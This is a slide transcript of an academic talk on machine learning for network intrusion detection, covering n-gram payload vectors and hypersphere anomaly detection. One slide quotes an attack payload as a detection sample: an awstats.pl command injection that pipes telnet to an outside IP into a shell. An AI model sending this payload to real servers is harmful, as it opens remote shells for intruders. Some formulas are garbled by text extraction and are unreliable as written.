Transcript Slide 1

1
Machine Learning
for Network Intrusion Detection
Dr. Marius Kloft, Dipl.-Math.
2
Personal Information
Berkeley,
California
• Dr. Marius Kloft
▫ Studies
 in physics and mathematics
▫ at University of Marburg
 in computer science
▫ in Berkeley and Berlin
▫ Degrees
 Dipl.-Mathematiker, 2006
▫ Thesis in pure math
 Dr. rer. nat., 2011
▫ Thesis in cs and statistics
• PhD advisors
▫ Prof. Dr. Klaus-Robert Müller
 (EECS, TU Berlin)
▫ Prof. Dr. Peter L. Bartlett
 (EECS & Statistics, UC Berkeley)
▫ Prof. Dr. Gilles Blanchard
 (Statistics, Uni Potsdam)
3
Dr. Marius Kloft
• Current occupation
▫ Post-Doc
 jointly appointed at
 Machine Learning
Laboratory, TU Berlin
▫ Head: Prof. Dr. KlausRobert Müller
 Friedrich-Miescher
Laboratory, Max Planck
Society, Tübingen
▫ Head: Dr. Gunnar
Rätsch
(will be transferred to
Sloan Center for Cancer
Research, New York)
• I am heading the SeqML
preoject team (Berlin/Tübingen)
▫ 2 PhD student
▫ 4 Master students
▫ PI: Prof. Müller
▫ Goal
 development of intelligent
algorithms (“machine learning”)
▫ for computational genome
annotation
4
Dr. Marius Kloft
• Research interests
▫ Statistical machine learning
methods
▫ Applications
 Detection of genes in genomic
DNA
 Development of new
algorithms
▫ mathematical
optimization thereof
 Analysis of their statistical
properties
 Detection of attacks in computer
networks
▫ in terms of probabilistic
bounds
 Multiple Kernel Learning
▫ My PhD thesis:
“Lp-Norm Multiple
Kernel Learning”
 Categorization of images
5
Machine Learning Laboratory, TU Berlin
• Remind project
• Some facts
▫ Head
 Prof. Dr. Klaus-Robert Müller
▫ Scientists
 11 post-Docs
 35 PhD students
▫ Research focus
 Development of novel
intelligent algorithms
▫ for analysis of complex data
▫ Joint project of TU Berlin and
Fraunhofer FIRST, Berlin
▫ Development of intelligent
methods for detecting intrusions
in computer networks
▫ Facts
 Until 2010
▫ 2 post-docs
▫ 5 PhD students
 Spin-Off “Trifense GmbH”
awarded first price of
„Gründungswettbewerb“ (BMWi)
6
Joint work with the members of the Remind project team:
Konrad Rieck, Pavel Laskov, Ulf Brefeld, Christian Gehl, Tammo Krüger,
Patrick Düssel, Nico Görnitz, Rene Gerstenberger, Guido Schwenk
7
Danger from the internet
What is machine learning (ML)?
Machine Learning for
Intrusion Detection
Talk Overview
Algorithms for
intrusion detection
Empirical analysis
8
Danger from Internet
• Internet as a risk factor:
▫ Omnipresence of computer
worms, viruses and trojans
▫ Major damage to companies
and customers
▫ Increasing criminalization
9
Why do we still get hacked?
• New vulnerabilities are
discovered
▫ 2,000-3,000 vulnerabilities
per year
• New attacks are developed
▫ high degree of automation
• Incident response is too
slow
10
How secure are modern detection tools?
• Experiment
▫ Current instances of malware
were collected from a
Nepenthes honeypot
• Conclusion
▫ After four weeks still 15% of
malware instances not
recognized!
▫ Files were scanned with Avira
AntiVir
• Results
▫ First scan:
▫ Second scan:
11
Danger from the internet
What is machine learning (ML)?
Machine Learning for
Intrusion Detection
Talk Overview
Algorithms for
intrusion detection
Empirical Analysis
12
What is statistical machine learning?
• Given:
▫ Data
• 2-step approach:
x1 ; ¢¢¢; x n
 E.g., xi could be a HTTP
request (e.g., computer
attack)
▫ Concepts y1 ; ¢¢¢; yn 2 f 0; 1g
 E.g., yi=1 could mean that xi is
a computer attack
• Goal:
▫ Finding a function f that models
the dependency between xi
and yi
 i.e., 8i : f (x i ) ¼ yi
▫ So that f generalizes to novel,
previously unseen (x,y)
 i.e., f (x) ¼ y
▫ 1. Training:
 Input data and concepts into
learning algorithm
 Learning Algorithm outputs f
▫ 2. Prediction:
 Use f(x) to predict labels y for
new, unseen x
• Core idea
▫ Choose an f that
 Fits the data well
 But is not too “complex”
13
Example: Trade-off of Fit and Complexity
• Data:
• Which f to
choose?
▫ Linear f
 Misses out two
points
(too simple)
• Machine learning solution:
▫ Not too complex, not too
easy
▫ Polynomial f
 Pro: Perfect on
training data
 Contra: does
not generalize
to new data
▫ Too complex
14
Danger from the internet
What is machine learning (ML)?
Machine Learning for
Intrusion Detection
Talk Overview
Algorithms for
intrusion detection
Empirical Analysis
15
Benefits of Machine
Learning to Intrusion Detection
• Ability to generalize from large amounts of data
▫ automation of decision making
▫ faster incident response times
• Understanding of statistical foundations of
empirical inference
▫ better accuracy, small false alarm rates
• Ability to detect novelty
▫ protection against new attacks
16
How Does Network Payload Look Like?
• Innocuous payload
▫ GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language:
en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie:
POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0
(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like
Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost:
www.spiegel.de
• Malicious payload
▫ GET /cgibin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctel
net%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%2
0%3b%20do%20sh%20%26%26%20break%3b%20done%202%3
e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%2
0YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost:
wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a
17
From Network Payload to Vectors
• General idea
▫ count occurrences of
substrings (“n-grams”)
 Example:
▫ Define an appropriate embedding
function:
 ©(" abracadabra" ) = (2; 2; 1; 1; 1; 1; 1)
▫ In the end, payload is represented
as vectors:
18
Detection of New Attacks
(Rieck et al., DIMVA 2007)
• Anomaly-based machine
learning approach
▫ Represent network payload
as vectors
▫ Finding a hypersphere
 that encloses the innocuous
data (blue circles)
 and generalizes to new data
▫ Points outside of the
hypersphere (red circles)
 are flagged as being
anomalous
19
How well does our system work?
• Detection results
▫ Evaluation on a real attack dataset generated by a penetration testing expert
▫ Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols
without false alarms
▫ Major improvement of accuracy in comparison to the standard signaturebased IDS Snort
20
Outlook: Extensions of the Framework
• Active learning
▫ Finding data points
 that – when presented to
security expert – maximally
help performance of the
system
▫ Problem: which labels to
present?
▫ In a nutshell: focus on points
that contain novel, uncertain
information
(e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009)
• Automatic feature selection
▫ Payloads can be represented by
various feature embeddings
 Which feature embedding to take?
▫ “Multiple Kernel Learning”
approach:
(M. Kloft, PhD thesis, 2011)
 Use all embeddings
simultaneously
▫ But take a weighted
combination
▫ Do it automatically at training
time
(e.g., Kloft et al., ACM AISEC 2008, ECML 2009,
NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)
21
Conclusions
• Intrusion detection
▫ Detecting malicious payload in network streams
• Machine learning approach
▫ Embedding of application payloads in vector spaces
▫ Detection of anomalies in embedded data
• Empirical analysis
▫ Detection of 80-93% unknown attacks
 no false positives
▫ Allows one to find novel attacks